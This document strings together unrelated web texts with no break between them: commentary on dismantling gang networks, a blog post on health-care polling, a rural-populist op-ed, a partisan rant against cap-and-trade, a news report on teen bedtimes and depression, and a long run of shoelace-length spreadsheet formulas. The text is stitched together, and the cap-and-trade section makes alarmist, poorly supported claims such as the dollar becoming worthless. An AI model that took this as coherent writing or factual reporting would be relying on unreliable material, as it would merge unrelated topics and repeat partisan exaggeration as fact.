Gangs are evolving groups that engage in opportunistic relationships , and no single typology defines them .
Currently , the most dangerous gangs at the national level are the Mara Salvatrucha ( MS - 13 ) and 18th Street , but there are also others .
Like the Mexican Mafia , present in various states but particularly all - powerful in the prisons of Southern California .
Gangs share operating channels with foreign groups like La Familia , the target of Operation Coronado earlier this year , or the infamous Zetas , whose special - operations background allows them to employ hyper - sophisticated technology .
These groups all draw strength from exploitation of financial channels , immigrant populations that stigma and a broken immigration system disincentivize from cooperating with the police , and a dysfunctional prison system that provides " power houses " of criminal activity instead of acting as a deterrent .
That , and the fact that kids think it ’s so cool to become a gangster — until they ’re trapped in a vicious cycle of violence .
While many initiatives are doubtless needed to prevent individuals from joining gangs ( both at the local and federal levels ) , our conversation presented some highlights on how to dismantle existing networks .
It is a difficult task given the complexity of the groups described above and the fact that law enforcement is evidence - based , while countering futures threats needs to be more intelligence - led .
So how do you turn reactive agencies into proactive ones ?
Organizations can address this issue internally .
It turns out the FBI , for one , is undergoing a significant reorientation , recruiting and empowering teams of analysts to look at trends and future projections .
( This stands in stark opposition to the Bureau ’s previous practice of promoting its file clerks to such positions . )
The hurdle can also be overcome through inter-agency collaboration .
Three main areas of opportunity are currently underexploited .
The first possibility is developing a national interoperable database for law enforcement .
Agencies currently operate on different systems for security reasons , making information sharing difficult and often hindering field agents ’ operations .
A common database would increase efficiency and help institutionalize data sharing in a system currently too reliant on interpersonal relationships .
The second one is fusion centers , instituted after 9/11 to overcome information - sharing barriers , and particularly crucial in the absence of common database systems .
Because DHS provided funding for whoever wanted to build a one , fusion centers grew somewhat organically .
As a result , some states have multiple fusion centers , while others have none .
Some fusion centers are much more oriented toward particular types of criminal activity than others .
And often , various centers within a same jurisdiction will not even talk to one another .
In sum , many fusion centers are now redundant and over bureaucratized – precisely what they were created to avoid .
Standardizing them would greatly help get important information to agents on the ground , while enabling them to conduct in - depth analysis would generate useful forecasts .
The third measure is interagency task forces , which have a track record of successfully dismantling particular criminal organizations .
The Arellano Felix Organization Task Force , based out of San Diego , is an example of multi-agency effort that crippled one of Mexico ’s main drug cartels over several years , and it provides a useful model to follow .
In addition to shifting the perspective of law enforcement , other necessary measures voiced were targeting money flows , facilitating cooperation with law enforcement agencies of foreign countries ( while being careful of vetting for corruption ) , and prison reform .
Each of these measures , of course , warrants its own separate and lengthy discussion .
What else is necessary ?
How can the U.S. government act strategically against organized crime instead of just " throwing darts at the wall " ?
At The Plum Line , Greg Sargent , delving into a CBS poll on the health - care reform bill currently in Congress , makes a great point about popular support for reform — and for Obama .
Allow me to quote his post in full :
Could Obama ’s dip to new lows on health care be driven partly by the fact that the reform proposal is n’t ambitious enough ?
The internals of the new CBS poll suggest that this could be the case :
They show that more people think reform does n’t go far enough in multiple ways than think it goes too far .
The CBS poll finds that Obama ’s approval rating on health care has dipped to 36 % .
But the poll also asked whether people think the reform proposal , in various ways , goes too far , is about right , or does n’t go far enough :
In every one of those polled — covering Americans , controlling costs , and regulating insurance companies — more think the bill does n’t go far enough .
To be sure , Americans seem close to evenly divided on the question of whether the proposal goes too far or not far enough .
But the latter category outnumbers the former , suggesting that the desire that reform be more ambitious is a key factor driving dissatisfaction with Obama — even though that possibility is rarely discussed by the big news orgs or by top - shelf pundits .
The “ big news orgs ” have taken up ( i.e. , manufactured , with the help of Republican propaganda ) the narrative that reform deeply divides the American people and may not have the support of a majority , and may actually be losing support .
But there is a big difference between this bill in particular and reform in general .
While it is possible to support both , as I do , it is also possible to support reform but not the bill .
This is the position of many on the left who , understandably , want reform to go further and therefore for the bill to be more robust , with a public option , if not a single - payer system .
( Personally , I support a single - payer system , but I support the bill as lesser reform because I think it ’s all that ’s realistically possible given the situation in Congress — the need for 60 votes in the Senate — and because I think it ’s better than nothing and possibly the thin end of the wedge leading to further and more substantial reform down the road . )
The point is , not everyone who opposes the bill is against reform — critics on the left may align with critics on the right with respect to this bill , but their opposition to it is not at all similar in substance .
And I think it ’s right that Obama ’s approval rating on health - care reform , feeding his ( recently declining ) approval rating generally , has been brought down by those who support reform but not the bill , that is , by those who want reform to be more ambitious .
Perhaps the president did what he had to do to get 60 votes in the Senate , which was to promote conciliation with those on the right of the Democratic caucus in the Senate , specifically with Nelson and Lieberman , along with Landrieu , Lincoln , and a few others .
In so doing , he pushed away those on the left who wanted him to go further .
Had he done that , though , he ( and Reid ) would likely have lost the votes needed to pass reform .
Such are the compromises one must make while sausage is being made .
As a result , his own numbers have suffered significantly , but , in the end , he ’ll get reform passed , and that will be historic , and perhaps , just perhaps , he will end up benefitting from an accomplishment that eluded his Democratic predecessors in the White House .
Otherwise , what is clear , it seems to me , is that health - care reform generally is far more popular than the “ big news orgs , ” the Republican - influenced news media , are letting on .
For when you delve into the details , when the specific goals of reform are separated out from the bill itself , when people actually think about what it ’s all about , as reflected in this poll , support for reform seems to be in the 55 - 65 percent range .
Once they see that reform is n’t socialism , or fascism , or whatever the Republican propagandists want to call it , and once they see how it benefits them personally , support , I suspect , will only go up .
Like Social Security and Medicare , it will become part of the fabric of American life , opening up the prospect of additional reform including , quite likely , a robust public option .
Whether Obama ’s approval ratings will go is another matter , but I suspect they will , too — that is , if his critics , those who support more ambitious reform , come to see , as they ought to , that this reform is much better than no reform , and that , while he could ( and should ) have done more , he did what he had to do .
I zipped up the Shenandoah Valley to Washington , D.C. , last week and got to rapping electoral numbers with this political expert dude .
Knowing I was a country person — a Bubba — he tried to explain why President Obama ’s numbers in rural America were dropping so quickly .
Like most inside - the - Beltway types who quietly think we ’re a bunch of ignorant rednecks , he seemed to suggest that racism was the cause of the erosion , but I reminded him that Obama ( the black guy ) far out - performed John Kerry ( the white guy ) in rural America .
And while I readily admit there are racists in rural America — as there are everywhere else in this country for that matter — this is the perfect illustration of how mathematically challenged my Democratic Party friends can be at times .
Racists were never in Obama ’s column .
They did n’t vote for him in the first place .
Like I told that dude , if Barack Obama wants to hit Bubba ’s heart and get him moving in his direction , he needs to start hunting in the Bubba - filled woods of cultural economic populism .
Rural polling has shown that when comparing “ lack of economic fairness ” to “ health care reform ” as driving issues , Bubba could give a rat ’s ass about “ health care reform . ”
Like everybody else , Bubba wants quality health care for him and his family , but the reality to many Bubbas is they could have the shiniest of Cadillac health care plans but they might as well park them on cinder blocks in the side yard .
That ’s because more than 80 percent of rural counties are designated as “ medically underserved ” since 500 hospitals have closed in rural America in the last 30 years , meaning that there are few , if any , doctors in four out of five rural counties .
Mortality rates in rural America are much higher than in other areas , and those high rates are not the end result of us hollering , “ Hey , y’all !
Watch this ! ”
Plus , if Bubba has a tooth ache , he might as well go to the work shed and grab the pliers because in much of rural America you could find a Tiffany ’s quicker than a dentist ’s office .
Even with government intervention , Bubba knows the healthcare facts of rural life will be difficult to reverse any time soon .
While we are 20 percent of the population , only 3 percent of today ’s medical students plan to practice in rural America .
But herein lies the power of economic populism .
Even with such a grim picture of health care in rural America , Bubba does n’t find health care reform the least bit sexy .
He ’s not down on Obama because he fears socialistic health care .
Bubba ’s down on Obama because he has been screwed by unchecked corporate greed for the last 30 years and is pissed that Obama , who sold himself as an agent of change , has yet to do a thing about it .
Talk about redistribution of wealth all you want .
In 1980 , 1 percent of the people had 8 percent of the nation ’s wealth .
Today , 1 percent has close to 25 percent .
Bubba only wants to once again make things and grow things and , unlike the Global Economy Theorists , he does n’t necessarily believe those days are gone with the wind .
As far as Bubba making things , Pat Buchanan pointed out very eloquently a couple of weeks ago that in the last 10 short years we ’ve gone from producing 32 percent of the world ’s domestic product to 24 percent , and no single group has felt the economic sting of that decline more than Bubba .
And the Bubba nation , which used to serve as the world ’s bread basket , has seen the greed of American - based , multi-national agricultural giants run unchecked to the point we now import more food than Bubba exports .
If you want to see how the American family farmer got screwed , you have to look no further than Iowa .
In 1978 , there were 60,000 family - owned hog farms in Iowa .
Because of vertical integration , there are less than 9,000 today .
That there is a damned shame .
Looking way ahead to 2012 , Obama desperately needs to grab the throttle of the economic fairness train or he ’s in serious danger of riding the early train back to Chicago .
Who ’s going to put him on the early train ?
I think it could very easily be Mike Huckabee .
Since the days of Teddy Roosevelt , there has never been a better political landscape for economic populism than now .
Besides being a Baptist preacher , which sits real well with his Republican base , Huckabee can also deliver a kick - ass populist sermon on the resurrection of economic fairness .
Even with Huckabee ’s sin , I believe if Obama does n’t tackle the issue of economic fairness for all Americans , Bubba would resoundingly answer a Huckabee altar call in huge numbers in 2012 .
And remember … there are a bunch of Bubbas living everywhere , not just in rural America .
There wo n’t be the same kind of “ change ” energy for Obama in 2012 that there was in 2008 .
Huckabee could win the White House using the same arithmetic Republican winners have used since 1980 : Jesus + Bubba = Glory .
Dave “ Mudcat ” Saunders , a former senior strategist and bubba coordinator for Mark Warner , Jim Webb , John Edwards , and Bob Graham , author , and has worked for years with NASCAR ’s legendary Wood Brothers Racing Team .
Government ’s view of the economy could be summed up in a few short phrases :
If it moves , tax it .
If it keeps moving , regulate it .
And if it stops moving , subsidize it . ” — Ronald Reagan
The so - called Land of the Free , has decided to recreate the ancient and rejected art of serfdom .
As in history , serfdom was enacted gradually with restrictive laws that slowly or in some cases quickly ate away at the right of the people to move freely , thus guaranteeing the government a stable tax base and its favorite enterprises , a stable work force to exploit , one that can not walk away .
In America that is about to be done by the new Cap and Trade Law , that will more than likely go into effect next year .
Only one of the chambers of the Congress has passed it but the other will soon if a miracle does not occur , and some Democrats develop a back bone and stand up for the people not the president !
In the name of all things green , humans in the Free World including the USA will be turned into serfs .
The Greens or rather Watermelons , Green on the outside , Marxist Red on the Inside have found the perfect tool with which to leverage the futures of all peoples in advanced nations .
No longer is the cry of power to the people , as the cover for the power grab of the more equal amongst the “ equals ” but instead it is the cry of Power to the Plants and the Fishes and the little buggy things that fly around and annoy you !
And it will cost the future of yourselves and your children , but Gaia will love you when you are decomposing in her belly , serf .
Gaia is a primordial deity in the Ancient Greek pantheon and considered a Mother Goddess or Great Goddess .
Source : Wikipedia
Her equivalent in the Roman Pantheon was Terra Mater or Tellus .
Romans , unlike Greeks , did not consistently distinguish an Earth goddess ( Tellus ) from a grain goddess ( Ceres ) . [ 2 ]
Today it appears this is the Green Ecologists new replacement for GOD !
But how will this be done ?
In the giant , unread “ democratic ” bills that the American Democrat controlled Congress is pushing through , some with literally up to ten thousand pages of unread and undebated laws .
Cap and Trade ( American Clean Energy and Security Act of 2009 ) will force all home owners to make extremely costly efficiency upgrades to their homes , for energy efficiency , before the government will give the serf , aka the citizen , a license to sell their home .
Of course , before the process begins , the serf must get and pay for a government inspection and another after the upgrades .
With the taxes associated with the proposed health reform bill , Cap and Trade , and the massive multi-trillion dollar debt that is growing daily .
Our dollar has lost 92 % of its value in the past 30 years , and is certainly will be worthless if the spending does not stop .
The American public will have to have a wheel barrel of dollars to buy a loaf of bread !
The middle class will disappear and what will remain is the government ruling class , the entertainment class and the academic elite !
They will not call us serfs , or unwashed but we will be those left out of the CHANGE Obama promised America !
Close Preview
Jan. 1 , 2010 -- Adolescents whose parents set earlier bedtimes are significantly less likely to suffer from depression or have suicidal thoughts compared to youngsters who hit the sack later , new research indicates .
Youngsters in the study whose parents set bedtimes of midnight or later were 24 % more likely to suffer from depression and 20 % more apt to have thoughts of suicide , compared to youngsters with bedtimes of 10 p.m. or earlier , researchers report in the Jan. 1 issue of the journal SLEEP .
This suggests sufficient sleep may offer youngsters some protection from depression and thoughts of suicide , the researchers say .
Adolescents who reported they usually sleep five or fewer hours per night were 71 % more likely to report depression , and 48 % more likely to have thoughts of committing suicide , compared to young people reporting eight hours of sleep nightly , the study shows .
" Our results are consistent with the theory that inadequate sleep is a risk factor for depression , " says study researcher James E. Gangwisch , PhD , of Columbia University Medical Center in New York .
He and his colleagues collected data on 15,659 adolescents and their parents who had participated in the National Longitudinal Study of Adolescent Health , a school - based sample of students in seventh to 12th grades , between 1994 and 1996 .
The researchers found that :
The average sleep duration was 7 hours and 53 minutes .
The researchers note that adolescents need 9 hours of sleep daily .
Nearly 70 % of youngsters said they went to bed at a time that complied with the weeknight limit set by their parents .
The researchers say lack of sleep may produce moodiness that hinders the ability to cope with stresses of daily life , harming relationships with peers and adults .
They say educating adolescents and their parents about the benefits of healthier sleep practices may be beneficial .
The researchers conclude that parents of adolescents should set earlier bedtimes to make sure their teens get adequate sleep .
One of the researchers , Gary K. Zammit , PhD , of Columbia , reported receiving research support from GlaxoSmithKline and other pharmaceutical companies .
He also disclosed he has financial interests in two companies involved in sleep research .
All of the underlying mathematical formulas from the Shoelace Length Calculator are shown here both in mathematical notation and in generic notation ( colored GREEN ) compatible with spreadsheet software ( like Microsoft Excel ) .
See the Accurate Shoelace Lengths page for more details .
P = Pairs of eyelets ; H = Horizontal spacing ; V = Vertical spacing ; W = Width of lugs ; L = Length of ends .
NOTE : These length formulas are based on five measurements :
Formulas for Total Shoelace Length
=H+( V×4 + √( H² +( V×3 ) ² ) ×6 ) ×INT ( ( P − 1 ) ÷5 ) +( √( H²+ V² ) ×(( P−1 ) MODULO 5 ) +L ) ×2
=H+( V*4+SQRT( H*H+V*V*9 ) * 6 ) * INT (( P - 1)/5 ) +( SQRT ( H* H+V*V ) * MOD ( ( P - 1) ,5 ) +L ) *
2
Army Lacing ( same formula as Bow Tie Lacing )
Method 1 ( Verticals at bottom , Shorter ) : =( H+V×INT ( P÷ 2 ) + √( H²+ V² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+V*INT ( P/2 ) + SQRT( H*H+V*V ) * INT ( ( P - 1)/2 ) +L ) *
2
Method 2 ( Diagonals at bottom , Longer ) : =( H+V×INT ( ( P − 1 ) ÷2 ) + √( H²+ V² ) ×INT ( P÷2 ) +L ) ×2 =( H+V*INT (( P - 1)/2 ) +SQRT( H*H+V*V ) * INT ( P/2 ) +L ) *
2
( For odd numbers of eyelet pairs , both formulas work out the same )
=( H×INT ( P÷ 6+1 ) + √( H² +( V×2 ) ² ) ×P÷3+L ) ×2+V×( P×4÷3−2 )
=( H* INT ( P/6+1 ) + SQRT ( H*H+V*V*4 ) *P/3+L ) *2+V*( P*4/3-2 )
( Only applicable for multiples of three eyelet pairs : P = 3 , 6 , 9 , 12 , etc. )
Bow Tie Lacing ( same formula as Army Lacing )
Method 1 ( Verticals at bottom , Shorter ) : =( H+V×INT ( P÷ 2 ) + √( H²+ V² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+V*INT ( P/2 ) + SQRT( H*H+V*V ) * INT ( ( P - 1)/2 ) +L ) *
2
Method 2 ( Diagonals at bottom , Longer ) : =( H+V×INT ( ( P − 1 ) ÷2 ) + √( H²+ V² ) ×INT ( P÷2 ) +L ) ×2 =( H+V*INT (( P - 1)/2 ) +SQRT( H*H+V*V ) * INT ( P/2 ) +L ) *
2
( For odd numbers of eyelet pairs , both formulas work out the same )
CAF Combat Boot Lacing ( same formula as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
=H+V× (( P−1 ) ×2 −( P MODULO 2 ) ) +√( H²+ V² ) ×(( P MODULO 2 ) +( P− 2 ) ×1.03 ) +√( H² +( V×( P−2 ) ) ² ) ×1.03+L×2
=H+V*(( P-1)*2-MOD ( P,2 ) ) + SQRT( H*H+V*V ) *( MOD ( P,2 ) +( P - 2) *1.03 ) +SQRT ( H*H + ( V *( P - 2 ) ) *( V *( P - 2 ) ) ) * 1.03+L*2
( This approximates 3 % longer diagonals to allow for loop unders )
Lace 1 ( Horizontal ) : =H×P+V×( P−1 ) +L×2 =H*P+V*( P -1 ) +L*2
( Note that End Lengths can be much shorter than other methods )
Lace 2 ( Vertical ) : = V×1.05 ×( P− 1 ) ×( Vertical Passes ) + L×2 = V *1.05 *( P - 1 ) *( Vertical Passes ) + L*2 ( This approximates 5 % longer verticals to allow for weaving )
Chevron Lacing ( same formula as Gap Lacing )
=( H+V + √( H²+ V² ) ×( P−2 ) +L ) ×2
=( H+V+SQRT ( H*H+V* V ) * ( P - 2 ) +L ) *
2
Method 1 , 2 or 3 ( Low , Mid or High X ) : = H × ( P−2 ) + √( H²+ V² ) ×6 + √( H² +( V×2 ) ² ) ×( P−4 ) + L×2 =H*( P -2 ) +SQRT( H*H+V*V ) * 6 + SQRT( H*H+V*V*4 ) *( P - 4) +L*2
Method 4 or 5 ( Two Xs ) : =H × ( P−3 ) + √( H²+ V² ) ×8 + √( H² +( V×2 ) ² ) ×( P−5 ) + L×2 =H *( P - 3 ) +SQRT( H*H+V*V ) * 8 + SQRT( H*H+V*V*4 ) *( P - 5) +L*2
Method 6 ( Three or more Xs ) : =( H+ √( H² + V² ) ×( P−1 ) +L ) ×2 =( H+ SQRT ( H*H+V* V ) *( P - 1 ) +L ) *
2
Method 7 ( Bottom X ) : =H × ( P−1 ) + √( H²+ V² ) ×4 + √( H² +( V×2 ) ² ) ×( P−3 ) +L×2 =H *( P -1 ) +SQRT( H*H+V*V ) * 4+ SQRT( H*H+V*V*4 ) *( P - 3) +L*2
=H×P+V ×( P−1 ) +L+75 mm
=H*P+V *( P-1 ) +L+75
( This allows 75 mm = 3 inches for the anchoring knot )
= H×3 + √( H²+ V² ) ×( P−1) ×2+L×4
= H*3 + SQRT ( H*H+V*V ) *( P -1)*2+L*4
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
=H+V× (( P−1 ) ×2 −( P MODULO 2 ) ) +√( H²+ V² ) ×( 2.06 −( P MODULO 2) ×0.03 ) +√( H² +( V×2 ) ² ) ×1.06 ×( P−3 ) +L×2
=H+V*(( P-1)*2-MOD ( P,2 ) ) + SQRT( H*H+V*V ) *( 2.06 - MOD ( P,2) *0.03 ) +SQRT ( H*H+V*V*4 ) *1.06 *( P - 3) +L*2
( This approximates 3 % longer diagonals to allow for loop unders )
Lace 1 ( Horizontal ) : =( H × ( P−1 ) +L ) ×2+V× ( ( P × 2 ) −3 ) =( H *( P - 1 ) +L ) * 2+V *( ( P* 2 ) -3 ) ( Note that End Lengths can be much shorter than other methods )
Lace 2 ( Vertical ) ( same formula as Lace 2 of Checkerboard Lacing ) : = V×1.05 ×( P− 1 ) ×( Vertical Passes ) + L×2 = V *1.05 *( P - 1 ) *( Vertical Passes ) + L*2 ( This approximates 5 % longer verticals to allow for weaving )
Display Shoe Lacing ( same formula as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
Lace 1 ( Bottom , Longer ) : =( H+ √( H² +( V×2 ) ² ) ×INT ( ( P − 1 ) ÷2 ) +L ) ×2 =( H+ SQRT( H*H+V*V*4 ) * INT ( ( P - 1) /2 ) +L ) *
2
Lace 2 ( Second , Shorter ) : =( H+ √( H² +( V×2 ) ² ) ×INT ( ( P − 2 ) ÷2 ) +L ) ×2 =( H+ SQRT( H*H+V*V*4 ) * INT ( ( P - 2)/2 ) +L ) *
2
( For even numbers of eyelet pairs , both formulas work out the same )
Method 1 ( Verticals at bottom , Shorter ) : =( H+V + √( H² +( V×2 ) ² ) ×( P−2 ) +L ) ×2 =( H+V+SQRT ( H*H+V * V* 4 ) *( P - 2 ) +L ) *
2
Method 2 ( Diagonals at bottom , Longer ) : =( H+ √( H² + V² ) + √( H² +( V×2 ) ² ) ×( P−2 ) +L ) * 2 =( H+ SQRT( H*H+V*V ) + SQRT( H*H+V*V*4 ) *( P - 2) +L ) *
2
Method 1
( Even number of eyelet pairs , Skip eyelets near ends , Shorter ) : =( H+L ) ×2 + √( H²+ V² ) ×( P−4 ) + √( H² +( V×3 ) ² ) ×( P−2 ) =( H+L ) * 2+ SQRT( H*H+V*V ) *( P - 4 ) +SQRT( H*H+V* V*9 ) * ( P - 2 )
Method 2
( Even number of eyelet pairs , Use all eyelets , Longer ) : =( H+L ) ×2 + √( H² + V² ) ×( P− 2 ) + √( H² +( V×2 ) ² ) ×4 + √( H² +( V×3 ) ² ) ×( P−4 ) =( H+L ) * 2+ SQRT( H*H+V*V ) *( P - 2 ) +SQRT( H*H+V*V*4 ) * 4+ SQRT(H*H+V*V*9 ) *( P - 4 )
Method 3
( Odd number of eyelet pairs , Skip eyelets near one end ) : =( H+ √( H² +( V×2 ) ² ) + L) ×2 + ( √( H²+ V² ) + √( H² +( V×3 ) ² ) ) ×( P−3 ) =( H+ SQRT ( H*H+V*V*4 ) +L ) * 2 +( SQRT ( H* H+V*V ) + SQRT( H*H+V* V*9 ) ) * ( P - 3 )
Double Helix Lacing ( same formula as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
Double Sided Lacing ( each lace , same as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
=H×( P+ ( P MODULO 2 ) ) +V× (( P−( P MODULO 2 ) ) ²÷2 + ( P MODULO 2 ) ×2 ) +L×2
=H*( P+MOD ( P,2 ) ) +V*(( P- MOD ( P,2 ) ) *( P- MOD ( P,2) )/2+MOD
(
P,2) *2) +L*2
=( H+V×INT ( ( P − 1 ) ÷2 ) + √( H² +( V×2 ) ² ) +L ) ×2 + √( H²+ V² ) ×INT ( P÷ 2 ) + √( H² +( V×3 ) ² ) ×INT ( ( P − 4 ) ÷2 )
=( H+V*INT (( P - 1)/2 ) + SQRT( H*H+V*V*4)+L ) * 2+SQRT(H*H+V*V ) * INT ( P/2 ) + SQRT( H*H+V*V*9 ) *INT ( ( P - 4 ) /2 )
Method 1 ( Basic ) : =( H+V×5 + √( H² + V² ) ×( P−4 ) +L ) ×2 =( H+V*5 +SQRT( H*H+V* V ) *( P - 4 ) +L ) *
2
Method 2 ( Corkscrew ) : =( H+V×6 + √( H² + V² ) ×( P−4 ) +L ) ×2 =( H+V*6 +SQRT ( H* H+V* V ) *( P - 4 ) +L ) * 2 ( Method 2 approximates 50 % longer on 2 x verticals wrapped around edges )
Method 3 ( Extended ) : =( H+V×8 + √( H² + V² ) ×( P−5 ) +L ) ×2 =( H+V*8 +SQRT( H*H+V* V ) *( P - 5 ) +L ) *
2
Method 4 ( Double extended ) : =( H+V×10 + √( H² + V² ) ×( P−5 ) +L ) ×2 =( H+V*10 + SQRT ( H* H+V* V ) *( P - 5 ) +L ) *
2
Method 1 ( Single vertical ) ( same formula as Chevron Lacing ) =( H+V+ √( H²+ V² ) ×( P−2 ) +L ) ×2 =( H+V+SQRT( H*H+V*V ) *( P - 2 ) +L ) *
2
Method 2 ( Double vertical ) : =( H+V×2 + √( H²+ V² ) ×( P−3 ) +L ) ×2 =( H+V*2+SQRT( H*H+V*V ) *( P - 3 ) +L ) *
2
=H×( P−2 ) + V×2 +√( H²+ V² ) ×( P−4 ) + √( H² +( V×2 ) ² ) + √( H² +( V×INT ( ( P+1 ) ÷ 2 ) ) ² ) ×2+ √( H² +( V×( P−2 ) ) ² ) +L×4
=H*( P -2 ) +V*2+SQRT(H*H+V*V ) *( P - 4 ) +SQRT( H*H+V*V*4 ) + SQRT( H*H+V*INT (( P+1)/2)*V*INT(( P+1)/2 ) ) * 2+SQRT(H*H+V *( P -2)*V*( P -2) ) +L*4
Method 1 ( Bi-color shoelace ) ( same formula as Criss Cross Lacing ) : =( H+ √( H² + V² ) ×( P−1 ) +L ) ×2 =( H+ SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
Method 2 ( Knotted halves , each half - shoelace ) : =H+ √( H²+ V² ) ×( P−1 ) +L+50 mm =H+ SQRT( H*H+V*V ) *( P -1 ) +L+50
( This allows 50 mm = 2 inches for the joining knot )
Method 3 ( Separate halves , each half - shoelace ) : =H÷2 + √( H²+ V² ) ×( P−1 ) +L+75 mm =H/2+SQRT(H*H+V*V ) *( P-1 ) +L+75
( This allows 75 mm = 3 inches for the anchoring knot )
Method 1 ( Bi-color shoelace ) ( same formula as Straight Bar Lacing ) : =( H×INT ( ( P+1 ) ÷2 ) + V× ( P−1 ) +L ) ×2 =( H* INT ( ( P+1 ) /2 ) +V*( P - 1 ) +L ) *
2
Method 2 ( Knotted halves ) , Half - shoelace 1 ( Bottom ) : = H×( INT ( P÷ 2) +0.5 ) + V× ( P−0.5 ) +L+50 mm =H*( INT ( P/2)+0.5 ) +V*( P-0.5 ) +L+50
( This allows 50 mm = 2 inches for the joining knot )
Method 2 ( Knotted halves ) , Half - shoelace 2 ( Second ) : = H× (( P−1 ) ÷2 + ( P MODULO 2 ) ×1.5 ) +V×( P−1.5 ) +L+50 mm =H*(( P-1)/2+MOD( P,2) *1.5 ) +V*( P-1.5 ) +L+50
( This allows 50 mm = 2 inches for the joining knot )
Method 3 ( Separate halves ) , Half - shoelace 1 ( Bottom , Longer ) : = H×( INT ( P÷ 2) +0.5 ) + V× ( P−1 ) +L+75 mm =H*( INT ( P/2)+0.5 ) +V*( P -1 ) +L+75
( This allows 75 mm = 3 inches for the anchoring knot )
Method 3 ( Separate halves ) , Half - shoelace 2 ( Second , Shorter ) : = H×( INT ( ( P− 1 ) ÷ 2)+0.5 ) + V× ( P−2 ) +L+75 mm =H*( INT ((P -1)/2)+0.5 ) +V*( P -2 ) +L+75
( This allows 75 mm = 3 inches for the anchoring knot )
Method 1
( Even number of eyelet pairs , Skip eyelets near ends , Shorter ) : =( H+L ) ×2+V× ( P−4 ) + √( H² +( V×3 ) ² ) ×( P−2 ) =( H+L ) * 2+V*( P - 4 ) +SQRT(H*H+V*V*9 ) *( P - 2 )
Method 2
( Even number of eyelet pairs , Use all eyelets , Longer ) : =( H+L ) ×2+V× ( P−2 ) + √( H² +( V×2 ) ² ) ×4 + √( H² +( V×3 ) ² ) ×( P−4 ) =( H+L ) * 2+V*( P -2 ) +SQRT( H*H+V*V*4 ) * 4+ SQRT(H*H+V*V*9 ) *( P - 4 )
Method 3
( Odd number of eyelet pairs , Skip eyelets near one end ) : =( H+ √( H² +( V×2 ) ² ) + L ) ×2 +( V+ √( H² +( V×3 ) ² ) ) ×( P−3 ) =( H+ SQRT ( H*H+V* V*4 ) +L ) * 2+( V+SQRT(H*H+V* V*9 ) ) * ( P - 3 )
=( H×( P+4 ) ÷5+L ) ×2+( V+SQRT( H²+( V×3 ) ² ) ) ×( P−1 ) ÷5×4
=( H*( P+4)/5+L ) * 2+( V+SQRT( H*H+V*V*9 ) ) *( P- 1)/5*4
( Only applicable when number of eyelet pairs P = 6 , 11 , 16 , 21 , 26 , etc. )
Hidden Knot Lacing ( same formula as Straight Bar Lacing )
=( H×INT ( ( P+1 ) ÷2 ) + V× ( P−1 ) +L ) ×2
=( H* INT ( ( P+1 ) /2 ) +V*( P - 1 ) +L ) *
2
Hiking / Biking Lacing ( same formula as Straight Bar Lacing )
=( H×INT ( ( P+1 ) ÷2 ) + V× ( P−1 ) +L ) ×2
=( H* INT ( ( P+1 ) /2 ) +V*( P - 1 ) +L ) *
2
=( H+V ) ×( 2 − ( P MODULO 2 ) ) + SQRT( H×H+V×V ) ×(( P MODULO 2 ) +INT (( P−1)/2) ×2.06 ) +L×2
=( H+V ) *( 2 - MOD ( P,2 ) ) + SQRT ( H*H+V*V ) *( MOD ( P,2 ) +INT (( P - 1)/2)*2.06 ) +L*2
( This approximates 3 % longer diagonals to allow for loop unders )
=( H+√( H²+ V² ) ×1.03 ×( P− 1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) * 1.03 *( P - 1 ) +L ) *
2
( This approximates 3 % longer diagonals to allow for knots )
=( H+ √( H²+ V² ) ×( P−0.75 ) +L) ×2
=( H+ SQRT ( H*H+V*V ) *( P - 0.75 ) +L ) *
2
( This approximates 25 % longer on two diagonals to allow for knot )
Method 1
( No lock at top , Shorter ) : =( ( H+V ) ×( P− 1 ) + L ) ×2 =( ( H+V ) * ( P - 1 ) +L ) *
2
Method 2
( With lock at top , Longer ) : =(( H+V ) ×P−V+L ) ×2 =(( H+V ) *P- V+L ) *
2
Method 1 ( Single verticals , Shorter ) : =( H+L ) ×2 + ( V×4 + √( H² +( V×3 ) ² ) × 6 ) ×( P − 1 ) ÷5 =( H+L ) * 2 + ( V* 4+SQRT( H*H+V* V*9 ) * 6 ) * ( P - 1 ) /5
Method 2 ( Double verticals , Longer ) : =( H+L ) ×2 + ( V×8 + √( H² +( V×3 ) ² ) × 6 ) ×( P − 1 ) ÷5 =( H+L ) * 2+ ( V* 8+SQRT( H*H+V* V*9 ) * 6 ) * ( P - 1 ) /5
( Only applicable when number of eyelet pairs P = 6 , 11 , 16 , 21 , 26 , etc. )
Left Right Lacing ( same formula as Criss Cross Lacing )
=( H+ √( H²+ V² ) ×( P−1 ) +L ) ×2
=( H+SQRT ( H*H+V*V ) *( P - 1 ) +L ) *
2
=H×( 2 − ( P MODULO 2 ) ) +√( H²+ V² ) ×( P− 1 ) + √( H² +( V ×( P−1 ) ) ² ) +( V×INT ( ( P − 1 ) ÷2 ) +L ) ×2
=H*(2 - MOD ( P,2 ) ) + SQRT ( H* H+V*V ) *( P - 1 ) + SQRT ( H*H + ( V *( P - 1 ) ) *( V * ( P - 1 ) ) ) +( V*INT ( ( P - 1) /2) +L ) *
2
Method 1 ( High lock , Shorter ) : =( H+V+ √( H²+ V² ) ×( P−2 ) + √( H² +( V÷2 ) ² ) +L ) ×2 =( H+V+SQRT( H*H+V*V ) *( P - 2 ) +SQRT( H*H+V*V/4)+L ) *
2
Method 2 ( Low lock , Medium ) : =( H+V+ √( H²+ V² ) ×( P−3 ) + √( H² +( V×2 ) ² ) + √( H² +( V÷2 ) ² ) +L ) ×2 =( H+V+SQRT( H*H+V*V ) *( P - 3 ) +SQRT( H*H+V*V*4 ) + SQRT( H*H+V*V/4)+L ) *
2
